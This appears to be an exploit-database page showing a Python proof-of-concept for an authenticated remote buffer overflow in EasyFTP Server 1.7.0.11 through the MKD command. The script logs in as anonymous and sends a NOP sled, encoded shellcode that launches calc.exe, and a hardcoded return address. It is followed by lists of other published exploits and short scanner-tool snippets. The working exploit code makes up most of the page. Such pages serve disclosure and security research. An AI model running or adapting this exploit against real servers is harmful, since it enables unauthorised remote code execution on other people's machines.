Menu

Search for hundreds of thousands of exploits

"EasyFTP Server 1.7.0.11 - 'MKD' (Authenticated) Remote Buffer Overflow"

Author

Exploit author

"Karn Ganeshen"

Platform

Exploit platform

windows

Release date

Exploit published date

2010-07-17

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#!/usr/bin/python
import socket,sys

# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]

print """
#
****************************************************************************
#									   #
*  Easy FTP Server v1.7.0.11 [MKD] Remote BoF Exploit Post Authentication  *
*  Author / Discovered by : Karn Ganeshen 				   *
*  Date : July 5, 2010							   *
*  KarnGaneshen [aT] gmail [d0t] com     				   *
*  http://ipositivesecurity.blogspot.com				   *
#									   #
****************************************************************************
#
"""

if len(sys.argv) != 3:
    print "Usage: ./easyftp_mkd.py <Target IP> <Port>"
    sys.exit(1)
 
target = sys.argv[1]
port = int(sys.argv[2])

# Buffer needed -> 272 bytes
# Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars \x00\x0a\x2f\x5c ]

shellcode = ("\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1"
"\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5"
"\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69"
"\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e"
"\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8"
"\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08"
"\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c"
"\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c"
"\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80"
"\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b"
"\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84"
"\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14"
"\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c"
"\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e"
"\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8"
"\x51\x6b\x28")

nopsled = "\x90" * 40
ret = "\x10\x3B\x88\00" # MAGIC RET 00883B10 (SP2) / 00893B58 (SP3) [ EBP points to nopsled when overflowed ]
payload = nopsled + shellcode + ret 

print "[+] Launching exploit against " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect=s.connect((target, port))
    print "[+] Connected!"
except:
    print "[!] Connection failed!"
    sys.exit(0)
    
s.recv(1024)

# Targetting default user 'anonymous' on the target
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)

print "[+] Sending payload..."
s.send('MKD ' + payload + '\r\n')

print "[!] Verifying if the user has 'Create Directory' permission. This may take some time..."

try:
    s.recv(1024)    
    print "[!] Uhh.. User does not have MKD privilege. +++Exploit failed+++"

except:
    print "[+] +++Exploit Successful+++ ^_^"

s.close()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2016-08-01 "Halliburton LogView Pro 9.7.5 - '.cgm' / '.tif' / '.tiff' / '.tifh' Crash (PoC)" dos windows "Karn Ganeshen"
2016-07-29 "mySCADAPro 7 - Local Privilege Escalation" local windows "Karn Ganeshen"
2016-07-25 "Mediacoder 0.8.43.5852 - '.m3u' (SEH)" local windows "Karn Ganeshen"
2016-07-25 "CoolPlayer+ Portable 2.19.6 - '.m3u' File Stack Overflow (Egghunter + ASLR Bypass)" local windows "Karn Ganeshen"
2016-07-21 "TFTP Server 1.4 - 'WRQ' Remote Buffer Overflow (Egghunter)" remote windows "Karn Ganeshen"
2016-07-06 "CIMA DocuClass ECM - Multiple Vulnerabilities" webapps php "Karn Ganeshen"
2016-05-17 "Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)" webapps multiple "Karn Ganeshen"
2016-03-03 "Schneider Electric SBO / AS - Multiple Vulnerabilities" remote hardware "Karn Ganeshen"
2016-02-04 "D-Link DVG­N5402SP - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2016-02-04 "GE Industrial Solutions UPS SNMP Adapter < 4.8 - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2016-01-18 "SeaWell Networks Spectrum - Multiple Vulnerabilities" webapps php "Karn Ganeshen"
2015-11-20 "Cambium ePMP 1000 - Multiple Vulnerabilities" webapps cgi "Karn Ganeshen"
2015-11-20 "ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2015-11-20 "ZTE ZXHN H108N R1A / ZXV10 W300 Routers - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2015-10-15 "netis RealTek Wireless Router / ADSL Modem - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2015-10-15 "PROLiNK H5004NK ADSL Wireless Modem - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2015-10-14 "ZYXEL PMG5318-B20A - OS Command Injection" webapps hardware "Karn Ganeshen"
2015-10-13 "F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal" webapps hardware "Karn Ganeshen"
2015-10-13 "NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2015-10-01 "PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities" remote hardware "Karn Ganeshen"
2010-07-17 "EasyFTP Server 1.7.0.11 - 'LIST' (Authenticated) Remote Buffer Overflow" remote windows "Karn Ganeshen"
2010-07-17 "EasyFTP Server 1.7.0.11 - 'MKD' (Authenticated) Remote Buffer Overflow" remote windows "Karn Ganeshen"
2010-02-04 "Sterlite SAM300 AX Router - 'Stat_Radio' Cross-Site Scripting" remote hardware "Karn Ganeshen"
2009-06-28 "Google Chrome 2.0.172 - 'chrome://history/' URI Cross-Site Scripting" remote multiple "Karn Ganeshen" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected